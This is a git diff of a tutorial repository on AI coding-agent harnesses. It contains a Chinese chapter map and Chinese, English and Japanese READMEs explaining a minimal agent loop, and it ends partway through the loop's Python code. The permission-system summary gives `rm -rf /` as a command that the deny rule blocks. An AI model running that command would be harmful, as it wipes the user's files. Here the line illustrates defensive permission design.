Cron (并行) + +Batch 4 (轻量, 最后): + s05 TodoWrite + s16 Team Protocols (并行) + s17 Autonomous + s18 Worktree (并行) +``` + +## 总工作量估算 + +| Batch | 章数 | 每章预估 | +|-------|------|---------| +| Batch 2 深度 | 6 章 | 2-3 Agent 调用 + 编辑 | +| Batch 3 定向 | 8 章 | 1-2 Agent 调用 + 编辑 | +| Batch 4 轻量 | 4 章 | 直接编辑 | +| **合计** | **18 章**(s01/s02/s08 已完成) | | diff --git a/docs/zh/s01-the-agent-loop.md b/docs/zh/s01-the-agent-loop.md index 86788dc98..5019e51f2 100644 --- a/docs/zh/s01-the-agent-loop.md +++ b/docs/zh/s01-the-agent-loop.md @@ -25,7 +25,7 @@ 一个退出条件控制整个流程。循环持续运行, 直到模型不再调用工具。 -## 工作原理 +## 工作原理 1. 用户 prompt 作为第一条消息。 diff --git a/docs/zh/s03-todo-write.md b/docs/zh/s03-todo-write.md index e593233a6..e77215eb7 100644 --- a/docs/zh/s03-todo-write.md +++ b/docs/zh/s03-todo-write.md @@ -26,7 +26,7 @@ | [ ] task A | | [>] task B <- doing | | [x] task C | - +-----------------------+ + +----------- ------------+ | if rounds_since_todo >= 3: inject into tool_result diff --git a/s01-s19-topic-map.md b/s01-s19-topic-map.md new file mode 100644 index 000000000..0658fd1d4 --- /dev/null +++ b/s01-s19-topic-map.md @@ -0,0 +1,118 @@ +# Learn Claude Code 主题划分分析 + +这个仓库的主线不是在"写一个智能体大脑",而是在拆解 **Agent Harness 工程**。也就是:模型负责 agency,代码负责给模型提供工具、上下文、知识、任务状态、并发能力、团队协作和执行隔离。 + +## 阶段划分 + +| 阶段 | 范围 | 核心问题 | +|---|---:|---| +| 第一阶段:工具管线 | s01-s04 | 模型怎么动手、怎么加工具、怎么管权限、怎么拦截 | +| 第二阶段:单 Agent 能力增强 | s05-s08 | 规划、上下文隔离、按需加载知识、压缩记忆 | +| 第三阶段:知识与韧性 | s09-s11 | 跨压缩/跨会话记忆、运行时 prompt 组装、错误恢复 | +| 第四阶段:持久化工作 | s12-s14 | 任务图、后台执行、定时调度 | +| 第五阶段:多 Agent 平台 | s15-s19 | 团队协作、协议握手、自治认领、worktree 隔离、MCP 插件 | + +## s01-s04 主题内容(Phase 1: Tool Pipeline) + +> **核心问题**: 模型怎么动手?加工具不改循环怎么做到?怎么管权限?怎么在不动工具代码的前提下改工具行为? + +| 主题 | 名称 | Motto | 内容是什么 | +|---|---|---|---| +| s01 | Agent Loop | *"One loop & Bash is all you need"* | 最小 agent 内核:`messages -> LLM -> tool_use -> execute tool -> append tool_result -> loop`。只有一个 `bash` 工具,重点是理解 `stop_reason == "tool_use"` 时继续循环,否则结束。对应 `s01_agent_loop/code.py`。 | +| s02 | Tool Use | *"Adding a tool means adding one handler"* | 把单一 `bash` 扩展成工具分发系统。新增 `read_file`、`write_file`、`edit_file`、`glob`,通过 `TOOL_HANDLERS` dispatch map 按工具名路由。重点是:加工具不改 agent loop,只加 schema 和 handler。对应 `s02_tool_use/code.py`。 | +| s03 | Permission System | *"Set boundaries first, then grant freedom"* | 把"一刀切禁止"升级为分级策略。引入 `PermissionGuard`,定义 allow/ask/deny 三种模式,`ls` 直接放行,`rm -rf /` 直接拒绝,中间的需确认。权限是光谱,不是两个按钮。对应 `s03_permission/code.py`。 | +| s04 | Hook System | *"Hook around the loop, never rewrite the loop"* | 在工具执行前后插入拦截层。引入 `HookManager`,支持 `PreToolUse`/`PostToolUse` 事件,三种模式 observe/modify/block。不改工具代码,也能改变工具行为——开闭原则的实践。对应 `s04_hooks/code.py`。 | + +## s05-s08 主题内容(Phase 2: Single-Agent Capability) + +> **核心问题**: 单个 agent 怎么稳定干长任务?怎么规划?怎么隔离上下文?怎么加载知识?上下文满了怎么办? + +| 主题 | 名称 | Motto | 内容是什么 | +|---|---|---|---| +| s05 | TodoWrite | *"An agent without a plan drifts"* | 给 agent 加会话内计划能力。`TodoManager` 维护 `pending / in_progress / completed`,且只允许一个任务处于 `in_progress`。还有 nag reminder:多轮不更新 todo 就注入提醒。重点是防止多步任务跑偏。对应 `s05_todo_write/code.py`。 | +| s06 | Subagent | *"Big tasks split small, each subtask gets clean context"* | 引入一次性子 agent。父 agent 通过 `task` 工具派生子 agent,子 agent 使用独立 `messages[]`,完成后只返回摘要。重点是上下文隔离:子任务读了很多文件,父上下文只收到结论。对应 `s06_subagent/code.py`。 | +| s07 | Skill Loading | *"Load knowledge on demand, not upfront"* | 引入按需知识加载。`SkillLoader` 扫描 skill 定义,系统提示里只放名称和描述,模型需要时调用 `load_skill` 注入完整内容。重点是避免把全部领域知识塞进 system prompt。对应 `s07_skill_loading/code.py`。 | +| s08 | Context Compact | *"Context always fills up -- have a way to make room"* | 引入上下文压缩。四层策略:snip_compact 裁旧对话、micro_compact 旧工具结果占位、tool_result_budget 大结果落盘、compact_history LLM 全量摘要。重点是让长任务不会被上下文窗口限制。对应 `s08_context_compact/code.py`。 | + +## s09-s11 主题内容(Phase 3: Knowledge and Resilience) + +> **核心问题**: 压缩会丢信息,怎么跨压缩/跨会话保持知识?prompt 怎么管理才不膨胀?出错怎么恢复? + +| 主题 | 名称 | Motto | 内容是什么 | +|---|---|---|---| +| s09 | Memory | *"Remember what matters, forget what doesn't"* | 引入持久记忆。三个子系统:Loading 每轮筛选相关记忆加载,Extraction 在 autoCompact 后自动发现偏好,Consolidation 定期整理去重。压缩是有损的,记忆系统补回了丢失的细节。对应 `s09_memory/code.py`。 | +| s10 | System Prompt | *"Prompts are assembled at runtime, not hardcoded"* | 把硬编码的 system prompt 拆成 `PROMPT_SECTIONS` 分段定义,按需拼接 `assemble_system_prompt`,加缓存避免重复组装。换项目只改 section,不改整个 prompt。对应 `s10_system_prompt/code.py`。 | +| s11 | Error Recovery | *"Errors aren't the end, they're the start of a retry"* | 三种恢复模式:输出截断时升级 max_tokens + 续写,上下文超限时 reactive compact,临时故障时指数退避 + 抖动重试。重点是错误不是终点,是分类 → 恢复的起点。对应 `s11_error_recovery/code.py`。 | + +## s12-s14 主题内容(Phase 4: Durable Work) + +> **核心问题**: 目标怎么跨会话存在?慢操作怎么不阻塞?周期性任务怎么自动触发? + +| 主题 | 名称 | Motto | 内容是什么 | +|---|---|---|---| +| s12 | Task System | *"Big goals break into small tasks, ordered, persisted to disk"* | 把 s05 的内存 todo 升级成磁盘持久化任务图。每个任务写成 JSON 文件,支持 `blockedBy` 依赖、`pending → in_progress → completed` 状态流转、完成后自动解锁后续任务。重点是让目标跨压缩、跨进程、跨会话存在。对应 `s12_task_system/code.py`。 | +| s13 | Background Tasks | *"Slow ops go background, agent keeps thinking"* | 引入后台执行。`BackgroundManager` 用线程运行慢命令,主 agent loop 继续工作;后台完成后通过通知队列把结果注入下一轮 LLM 上下文。重点是 `pytest`、`npm install` 不再阻塞 agent 思考。对应 `s13_background_tasks/code.py`。 | +| s14 | Cron Scheduler | *"Fire on schedule, no human kick needed"* | 引入定时调度。独立 cron 线程 + 任务队列,支持持久化(`durable: true`,写入 `scheduled_tasks.json`)和会话级两种模式。重点是 Agent 自己按时间表做事,不需要人来推。对应 `s14_cron_scheduler/code.py`。 | + +## s15-s19 主题内容(Phase 5: Multi-Agent Platform) + +> **核心问题**: 单 agent 搞不定的任务怎么分工?队友间怎么通信?怎么让队友自己找活?多个 agent 怎么避免文件冲突?外部工具怎么接入? + +| 主题 | 名称 | Motto | 内容是什么 | +|---|---|---|---| +| s15 | Agent Teams | *"Too big for one agent -- delegate to teammates"* | 引入持久队友。`TeammateManager` 创建有名字、有角色、有状态的 teammate,每个 teammate 有自己的 agent loop;`MessageBus` 用 JSONL 文件做异步邮箱。重点是从一次性 subagent 进化到持久协作 agent。对应 `s15_agent_teams/code.py`。 | +| s16 | Team Protocols | *"Teammates need shared communication rules"* | 给团队通信加协议。核心模式是 `request_id + pending/approved/rejected FSM`,用于 graceful shutdown 和 plan approval。重点是:队友之间不能只靠自由文本聊天,高风险动作要有结构化握手。对应 `s16_team_protocols/code.py`。 | +| s17 | Autonomous Agents | *"Teammates check the board, claim work themselves"* | 让队友具备自治能力。teammate 空闲后会轮询 inbox 和任务看板,发现未认领且未阻塞的任务就自动 claim;同时有 idle timeout 和身份重注入,防止压缩后忘记自己是谁。重点是从"领导分配任务"走向"队友自己找活"。对应 `s17_autonomous_agents/code.py`。 | +| s18 | Worktree Isolation | *"Each works in its own directory, no interference"* | 给任务绑定独立 git worktree。`.tasks/` 是控制面,`.worktrees/` 是执行面,任务 ID 和 worktree 绑定;支持创建、运行命令、保留、删除、事件日志。重点是多个 agent 并行改代码时目录隔离,避免互相覆盖。对应 `s18_worktree_isolation/code.py`。 | +| s19 | MCP Plugin | *"Not enough capability? Plug in more via MCP"* | 引入 MCP 外部工具协议。`MCPClient` 模拟 `tools/list` + `tools/call` 发现和调用外部工具;`assemble_tool_pool` 把内置工具和 MCP 工具合并成一个池子,`mcp__{server}__{tool}` 命名避免冲突。重点是外部能力通过标准协议接入,不需要重写工具代码。对应 `s19_mcp_plugin/code.py`。 | + +## 最关键的递进关系 + +s01-s02 解决"模型怎么动手"。一个循环,一个分发表,加工具不改循环。 + +s03-s04 解决"怎么管住模型的动手"。权限是光谱不是开关,拦截在外不在内。 + +s05-s08 解决"单个 agent 怎么稳定干长任务"。先列计划,再隔离上下文,按需加载知识,满了就压缩。 + +s09-s11 解决"知识和韧性怎么跨会话存在"。压缩会丢信息——记忆补回来;prompt 别写死——运行时组装;出错别崩——分类恢复。 + +s12-s14 解决"目标和执行怎么脱离单次对话"。任务持久化到磁盘,慢操作丢后台,定时任务自动触发。 + +s15-s19 解决"多 agent 怎么协作、自治、隔离、扩展"。持久队友 + 异步邮箱、协议握手、自治认领、worktree 目录隔离、MCP 外部工具接入。 + +## 层级 (Harness Layer) 划分 + +| Layer | Harness 层 | 章节 | +|-------|-----------|------| +| 循环 | 基础连接 | s01 | +| 分发 | 扩展边界 | s02 | +| 安全门 | 权限管线 | s03 | +| 扩展点 | 钩子拦截 | s04 | +| 规划 | 会内计划 | s05 | +| 隔离 | 子上下文 | s06 | +| 知识 | 按需加载 | s07 | +| 压缩 | 上下文管理 | s08 | +| 记忆 | 跨会话积累 | s09 | +| 提示 | 运行时组装 | s10 | +| 韧性 | 错误恢复 | s11 | +| 任务 | 持久目标 | s12 | +| 后台 | 异步执行 | s13 | +| 调度 | 定时触发 | s14 | +| 团队 | 持久队友 | s15 | +| 协议 | 结构化握手 | s16 | +| 自治 | 自主认领 | s17 | +| 隔离 | 目录隔离 | s18 | +| 插件 | 外部能力 | s19 | + +## 推荐阅读顺序 + +1. 先读根目录 `README.md`,把"模型负责 agency,harness 负责落地"的基本立场立住。 +2. 按顺序读 `s01_agent_loop/README.md` 到 `s19_mcp_plugin/README.md`,每章只关注新增机制。 +3. 对照运行各章 `code.py`,看每章新增的工具和类。 +4. 最后读 `s_full/code.py`,把所有机制合成一张完整 harness 架构图。 + +## 递进规则 + +每个章节只做一件事:在上一个章节的基础上,加一个新机制。核心循环 `while True` 从 s01 到 s19 从未改变。循环属于 agent,机制属于 harness。 + + diff --git a/s01_agent_loop/README.en.md b/s01_agent_loop/README.en.md new file mode 100644 index 000000000..77503ed5e --- /dev/null +++ b/s01_agent_loop/README.en.md @@ -0,0 +1,193 @@ +# s01: The Agent Loop — One Loop Is All You Need + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +`s01` → [s02](../s02_tool_use/) → s03 → s04 → ... → s19 +> *"One loop & Bash is all you need"* — One tool + one loop = one Agent. +> +> **Harness Layer**: The Loop — the first bridge between the model and the real world. + +--- + +## The Problem + +Language models can reason about code, but they can't touch the real world — they can't read files, run commands, or see error messages. + +You could give it a tool (like bash), and it would get a result on the first call. But then what? + +**You copy-paste the result back into the chat and ask it to continue.** You become the loop. What we need is to automate that copy-paste. + +--- + +## The Solution + +![Agent Loop](images/agent-loop.en.svg) + +A `while True` loop: keep going when the model calls a tool, stop when it doesn't. The entire process hinges on two signals: + +| Signal | Meaning | Loop Action | +|--------|---------|-------------| +| `stop_reason == "tool_use"` | Model raises hand: "I need a tool" | Execute → feed result back → continue | +| `stop_reason != "tool_use"` | Model says: "I'm done" | Exit loop | + +--- + +## How It Works + +Let's translate this process into code. Step by step: + +**Step 1**: Start with the user's question as the first message. + +```python +messages = [{"role": "user", "content": query}] +``` + +**Step 2**: Send the messages and tool definitions to the LLM. + +```python +response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, +) +``` + +**Step 3**: Append the model's response and check whether it called a tool. No tool call → done. + +```python +messages.append({"role": "assistant", "content": response.content}) +if response.stop_reason != "tool_use": + return +``` + +**Step 4**: Execute the tool the model requested and collect the results. + +```python +results = [] +for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) +``` + +**Step 5**: Append the tool results as a new message and go back to Step 2. + +```python +messages.append({"role": "user", "content": results}) +``` + +Assembled into a complete function: + +```python +def agent_loop(messages): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) + messages.append({"role": "user", "content": results}) +``` + +Under 30 lines — that's the entire Agent. The next 18 chapters all add mechanisms on top of this loop. The loop itself never changes. + +--- + +## Try It + +```sh +cd learn-claude-code +python s01_agent_loop/code.py +``` + +Try these prompts: + +1. `Create a file called hello.py that prints "Hello, World!"` +2. `List all Python files in this directory` +3. `What is the current git branch?` + +What to watch for: When does the model call a tool (loop continues), and when does it not (loop ends)? + +--- + +## What's Next + +Right now the model only has bash — reading files requires `cat`, writing files requires `echo ... >`, finding files requires `find`. Ugly and error-prone. + +→ s02 Tool Use: What happens when we give it 5 proper tools? Will the model call multiple tools at once? Will parallel tool executions step on each other? + +
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `src/query.ts` (1729 lines). The core differences are twofold: CC doesn't check the `stop_reason` field but instead inspects whether the content contains `tool_use` blocks (because `stop_reason` is unreliable in streaming responses); CC has more exit paths and recovery strategies for production-grade protection. + +**The 30-line `while True` from the teaching version IS the core of CC's 1729 lines.** Everything below is a protection mechanism layered on top of that core. + +
+1. Loop Structure Differences + +The teaching version checks `response.stop_reason`. CC doesn't use this field — in streaming responses, `stop_reason` may not have updated yet even though `tool_use` blocks are already present in the content. CC uses a `needsFollowUp` flag: during streaming message reception (`query.ts:832-835`), it's set to `true` whenever a `tool_use` block is detected. + +```typescript +// query.ts:554-558 +// stop_reason === 'tool_use' is unreliable. +// Set during streaming whenever a tool_use block arrives. +let needsFollowUp = false +``` + +
+ +
+2. State Object — All 11 Fields (Teaching Version Only Uses messages) + +| # | Field | Purpose | Chapter | +|---|-------|---------|---------| +| 1 | `messages` | Message array for the current iteration | s01 | +| 2 | `toolUseContext` | Tool, signal, and permission context | s02 | +| 3 | `autoCompactTracking` | Compaction state tracking | s08 | +| 4 | `maxOutputTokensRecoveryCount` | Token recovery attempt count (max 3) | s11 | +| 5 | `hasAttemptedReactiveCompact` | Whether reactive compaction was attempted this round | s08 | +| 6 | `maxOutputTokensOverride` | 8K→64K upgrade override | s11 | +| 7 | `pendingToolUseSummary` | Background Haiku-generated tool use summary | s08 | +| 8 | `stopHookActive` | Whether the stop hook produced a blocking error | s04 | +| 9 | `turnCount` | Turn count (for maxTurns check) | s01 | +| 10 | `transition` | Last continue reason | s11 | +| 11 | `taskBudgetRemaining` | Cross-compaction-boundary task_budget | s05 | + +
+ +
+3. Exit Paths (10) and Continue Paths (7) + +The teaching version has only 1 exit path. CC has 10 `return` points and 7 "continue" modes (not exiting but entering the next round for different reasons). This is the protection layer required for a production-grade Agent — timeouts, budget overruns, user interruptions, tool execution abortions, etc. Each scenario has a corresponding recovery or exit strategy. + +
+ +
+4. Streaming Tool Execution and QueryEngine + +CC's `StreamingToolExecutor` (`query.ts:561`) allows tools to begin parallel execution while the model is still generating. `QueryEngine.ts` adds additional protections for cost overruns, structured output validation failures, and more. The teaching version doesn't implement these — the goal is conceptual clarity, not peak performance. + +
+ +**In one sentence**: The core of query.ts's 1729 lines is a 30-line `while True`. All the complex fields and exit paths are protection mechanisms. Understand the core loop first, and everything that follows unfolds naturally. + +
+ + diff --git a/s01_agent_loop/README.ja.md b/s01_agent_loop/README.ja.md new file mode 100644 index 000000000..8870e6349 --- /dev/null +++ b/s01_agent_loop/README.ja.md @@ -0,0 +1,193 @@ +# s01: Agent Loop — ループ一つで十分 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +`s01` → [s02](../s02_tool_use/) → s03 → s04 → ... → s19 +> *"One loop & Bash is all you need"* — ツール一つ + ループ一つ = 一つの Agent。 +> +> **Harness レイヤー**: ループ — モデルと現実世界をつなぐ最初の架け橋。 + +--- + +## 課題 + +言語モデルはコードについて推論できるが、現実世界には触れられない — ファイルを読めない、コマンドを実行できない、エラーを見られない。 + +ツール(例:bash)を一つ与えれば、最初の呼び出しで結果を得られる。しかしその後は? + +**あなたが結果をコピーしてチャットに貼り付け、続きを促す。** あなたがループそのものだ。この「コピー&ペースト」を自動化する必要がある。 + +--- + +## ソリューション + +![Agent Loop](images/agent-loop.ja.svg) + +一つの `while True` ループ — モデルがツールを呼べば続き、呼ばなければ停止。全体でたった 2 つのシグナル: + +| シグナル | 意味 | ループの動作 | +|----------|------|-------------| +| `stop_reason == "tool_use"` | モデルが「ツールが必要」と挙手 | 実行 → 結果を戻す → 続行 | +| `stop_reason != "tool_use"` | モデルが「完了」と宣言 | ループ終了 | + +--- + +## 仕組み + +このプロセスをコードに変換してみよう。ステップごとに: + +**ステップ 1**:ユーザーの質問を最初のメッセージとして設定する。 + +```python +messages = [{"role": "user", "content": query}] +``` + +**ステップ 2**:メッセージとツール定義を一緒に LLM に送信する。 + +```python +response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, +) +``` + +**ステップ 3**:モデルの応答を追加し、ツールを呼び出したか確認する。呼び出しなし → 終了。 + +```python +messages.append({"role": "assistant", "content": response.content}) +if response.stop_reason != "tool_use": + return +``` + +**ステップ 4**:モデルが要求したツールを実行し、結果を収集する。 + +```python +results = [] +for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) +``` + +**ステップ 5**:ツールの結果を新しいメッセージとして追加し、ステップ 2 に戻る。 + +```python +messages.append({"role": "user", "content": results}) +``` + +完全な関数に組み立てる: + +```python +def agent_loop(messages): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) + messages.append({"role": "user", "content": results}) +``` + +30 行未満 — これが Agent の全てだ。次の 18 章はすべてこのループの上に仕組みを積み重ねていく。ループ自体は永遠に変わらない。 + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s01_agent_loop/code.py +``` + +以下のプロンプトを試してみよう: + +1. `Create a file called hello.py that prints "Hello, World!"` +2. `List all Python files in this directory` +3. `What is the current git branch?` + +観察のポイント:モデルがツールを呼び出すとき(ループ継続)、呼び出さないとき(ループ終了)の違い。 + +--- + +## 次へ + +現在、モデルが持っているのは bash だけだ — ファイルを読むには `cat`、書くには `echo ... >`、探すには `find`。不便でエラーも起きやすい。 + +→ s02 Tool Use:5 つの本格的なツールを与えたらどうなる? モデルは複数のツールを同時に呼び出すか? 並列実行で競合は起きないか? + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `src/query.ts`(1729 行)の完全分析に基づく。核心的な違いは二つ:CC は `stop_reason` フィールドを確認せず、コンテンツに `tool_use` ブロックが含まれるかをチェックする(ストリーミングレスポンスでは `stop_reason` が信頼できないため)。CC には本番環境向けのより多くの終了パスとリカバリ戦略がある。 + +**教育版の 30 行 `while True` が CC の 1729 行の核心。** 以下の各項目は、すべてその核心の上に積み重ねられた保護機構である。 + +
+一、ループ構造の違い + +教育版は `response.stop_reason` をチェックする。CC はこのフィールドを使わない — ストリーミングレスポンスでは、`stop_reason` がまだ更新されていなくても、コンテンツに既に `tool_use` ブロックが含まれている可能性がある。CC は `needsFollowUp` フラグを使用する:ストリーミングメッセージの受信時(`query.ts:832-835`)に、`tool_use` ブロックが検出されると `true` に設定される。 + +```typescript +// query.ts:554-558 +// stop_reason === 'tool_use' is unreliable. +// Set during streaming whenever a tool_use block arrives. +let needsFollowUp = false +``` + +
+ +
+二、State オブジェクトの全 11 フィールド(教育版は messages のみ使用) + +| # | フィールド | 用途 | 対応章 | +|---|-----------|------|--------| +| 1 | `messages` | 現在のイテレーションのメッセージ配列 | s01 | +| 2 | `toolUseContext` | ツール、シグナル、権限コンテキスト | s02 | +| 3 | `autoCompactTracking` | 圧縮状態の追跡 | s08 | +| 4 | `maxOutputTokensRecoveryCount` | トークンリカバリ試行回数(上限 3) | s11 | +| 5 | `hasAttemptedReactiveCompact` | 今回のラウンドでリアクティブ圧縮を試みたか | s08 | +| 6 | `maxOutputTokensOverride` | 8K→64K へのアップグレード上書き | s11 | +| 7 | `pendingToolUseSummary` | バックグラウンド Haiku 生成のツール使用要約 | s08 | +| 8 | `stopHookActive` | 停止フックがブロッキングエラーを発生させたか | s04 | +| 9 | `turnCount` | ターン数(maxTurns チェック用) | s01 | +| 10 | `transition` | 前回の継続理由 | s11 | +| 11 | `taskBudgetRemaining` | 圧縮境界をまたぐ task_budget | s05 | + +
+ +
+三、終了パス(10)と継続パス(7) + +教育版には 1 つの終了パスしかない。CC には 10 の `return` ポイントと 7 つの「継続」モードがある(終了せず、異なる理由で次のラウンドに入る)。これが本番環境の Agent に必須の保護層 — タイムアウト、予算超過、ユーザー中断、ツール実行中の中止など。各シナリオには対応するリカバリまたは終了戦略がある。 + +
+ +
+四、ストリーミングツール実行と QueryEngine + +CC の `StreamingToolExecutor`(`query.ts:561`)は、モデルがまだ生成中にツールの並列実行を開始できる。`QueryEngine.ts` はさらに、コスト超過や構造化出力の検証失敗などの保護を追加する。教育版はこれらを実装しない — 目標は概念の明確さであり、極限のパフォーマンスではない。 + +
+ +**一言で**: query.ts の 1729 行の核心は 30 行の `while True`。複雑なフィールドや終了パスはすべて保護機構だ。まず核心のループを理解すれば、その後のすべては自然に理解できる。 + +
+ + diff --git a/s01_agent_loop/README.md b/s01_agent_loop/README.md new file mode 100644 index 000000000..12e189917 --- /dev/null +++ b/s01_agent_loop/README.md @@ -0,0 +1,193 @@ +# s01: Agent Loop — 一个循环就够了 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +`s01` → s02 → s03 → s04 → ... → s19 +> *"One loop & Bash is all you need"* — 一个工具 + 一个循环 = 一个 Agent。 +> +> **Harness 层**: 循环 — 模型与真实世界的第一道连接。 + +--- + +## 问题 + +语言模型能推理代码,但碰不到真实世界——不能读文件、不能跑命令、不能看报错。 + +你可以给它一个工具(比如 bash),让它第一次调用拿到了结果。但然后呢? + +**你自己把结果复制粘贴回对话框,再让它继续。** 那你就是那个循环。我们要做的,就是把这个"复制粘贴"自动化。 + +--- + +## 解决方案 + +![Agent Loop](images/agent-loop.svg) + +一个 `while True` 循环,模型调用工具就继续,不调用就停。整个过程只有两个信号: + +| 信号 | 含义 | 循环动作 | +|------|------|---------| +| `stop_reason == "tool_use"` | 模型举手说"我要用工具" | 执行 → 结果喂回去 → 继续 | +| `stop_reason != "tool_use"` | 模型说"我做完了" | 退出循环 | + +--- + +## 工作原理 + +将这个过程翻译成代码。分步来看: + +**第 1 步**:把用户的问题作为第一条消息。 + +```python +messages = [{"role": "user", "content": query}] +``` + +**第 2 步**:将消息和工具定义一起发给 LLM。 + +```python +response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, +) +``` + +**第 3 步**:追加模型回答,检查它是否调了工具。没调 → 结束。 + +```python +messages.append({"role": "assistant", "content": response.content}) +if response.stop_reason != "tool_use": + return +``` + +**第 4 步**:执行模型要求的工具,收集结果。 + +```python +results = [] +for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) +``` + +**第 5 步**:把工具结果作为新消息追加,回到第 2 步。 + +```python +messages.append({"role": "user", "content": results}) +``` + +组装为一个完整函数: + +```python +def agent_loop(messages): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) + messages.append({"role": "user", "content": results}) +``` + +不到 30 行,这就是整个 Agent。后面 18 个章节都在这个循环上叠加机制——循环本身始终不变。 + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s01_agent_loop/code.py +``` + +试试这些 prompt: + +1. `Create a file called hello.py that prints "Hello, World!"` +2. `List all Python files in this directory` +3. `What is the current git branch?` + +观察重点:模型什么时候调用工具(循环继续),什么时候不调用(循环结束)? + +--- + +## 接下来 + +现在模型手里只有 bash 一个工具——读文件要 `cat`,写文件要 `echo ... >`,找个文件要 `find`,又丑又容易出错。 + +s02 Tool Use → 给它 5 个真正的工具,会发生什么?模型会不会一次调用多个工具?几个工具同时跑会不会互相踩? + +
+深入 CC 源码 + +> 以下内容基于 CC 源码 `src/query.ts`(1729 行)的完整分析。核心差异就两个:CC 不看 `stop_reason` 字段而是检查内容里有没有 tool_use 块(因为流式响应中 stop_reason 不可靠);CC 有更多的退出路径和恢复策略做生产级保护。 + +**教学版的 30 行 `while True` 就是 CC 1729 行的核心。** 下面每一项都是在这个核心上叠加的保护机制。 + +
+一、循环结构差异 + +教学版检查 `response.stop_reason`。CC 不用这个字段——流式响应中 `stop_reason` 可能还没更新但内容里已经有 `tool_use` 块了。CC 用 `needsFollowUp` 标志:接收到流式消息时(`query.ts:832-835`),只要检测到 `tool_use` 块就设为 `true`。 + +```typescript +// query.ts:554-558 +// stop_reason === 'tool_use' is unreliable. +// Set during streaming whenever a tool_use block arrives. +let needsFollowUp = false +``` + +
+ +
+二、State 对象完整 11 字段(教学版只用 messages) + +| # | 字段 | 用途 | 对应章节 | +|---|------|------|---------| +| 1 | `messages` | 当前迭代的消息数组 | s01 | +| 2 | `toolUseContext` | 工具、信号、权限上下文 | s02 | +| 3 | `autoCompactTracking` | 压缩状态追踪 | s08 | +| 4 | `maxOutputTokensRecoveryCount` | token 恢复尝试次数(上限 3) | s11 | +| 5 | `hasAttemptedReactiveCompact` | 本轮是否已尝试响应式压缩 | s08 | +| 6 | `maxOutputTokensOverride` | 8K→64K 的升级覆盖 | s11 | +| 7 | `pendingToolUseSummary` | 后台 Haiku 生成的 tool use 摘要 | s08 | +| 8 | `stopHookActive` | 停止钩子是否产生阻塞错误 | s04 | +| 9 | `turnCount` | 轮次计数(maxTurns 检查) | s01 | +| 10 | `transition` | 上一次继续原因 | s11 | +| 11 | `taskBudgetRemaining` | 跨压缩边界的 task_budget | s05 | + +
+ +
+三、退出路径(10 个)和继续路径(7 个) + +教学版只有 1 条退出路径。CC 有 10 个 `return` 点和 7 种"继续"方式(不退出但以不同原因进入下一轮)。这是生产级 Agent 必须的保护层——超时、超预算、用户中断、工具执行中被中止等等。每种场景都有对应的恢复或退出策略。 + +
+ +
+四、流式工具执行和 QueryEngine + +CC 的 `StreamingToolExecutor`(`query.ts:561`)让工具在模型还在生成时就开始并行执行。`QueryEngine.ts` 额外加了费用超限、结构化输出验证失败等保护。教学版不实现这些——目标是概念清晰,不是性能极致。 + +
+ +**一句话**:1729 行的 query.ts 核心就是 30 行 `while True`。所有复杂字段和退出路径都是保护机制。先理解核心循环,后面的一切自然展开。 + +
+ + diff --git a/s01_agent_loop/code.py b/s01_agent_loop/code.py new file mode 100644 index 000000000..6a4459d3b --- /dev/null +++ b/s01_agent_loop/code.py @@ -0,0 +1,137 @@ +#!/usr/bin/env python3 +""" +s01_agent_loop.py - The Agent Loop + +The entire secret of an AI coding agent in one pattern: + + while stop_reason == "tool_use": + response = LLM(messages, tools) + execute tools + append results + + +----------+ +-------+ +---------+ + | User | ---> | LLM | ---> | Tool | + | prompt | | | | execute | + +----------+ +---+---+ +----+----+ + ^ | + | tool_result | + +---------------+ + (loop continues) + +This is the core loop: feed tool results back to the model +until the model decides to stop. Production agents layer +policy, hooks, and lifecycle controls on top. + +Usage: + pip install anthropic python-dotenv + ANTHROPIC_API_KEY=... python s01_agent_loop/code.py +""" + +import os +import subprocess + +try: + import readline + # macOS 的 libedit 在处理中文输入时有退格问题,这四行修复它 + readline.parse_and_bind('set bind-tty-special-chars off') + readline.parse_and_bind('set input-meta on') + readline.parse_and_bind('set output-meta on') + readline.parse_and_bind('set convert-meta off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) + +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {os.getcwd()}. Use bash to solve tasks. Act, 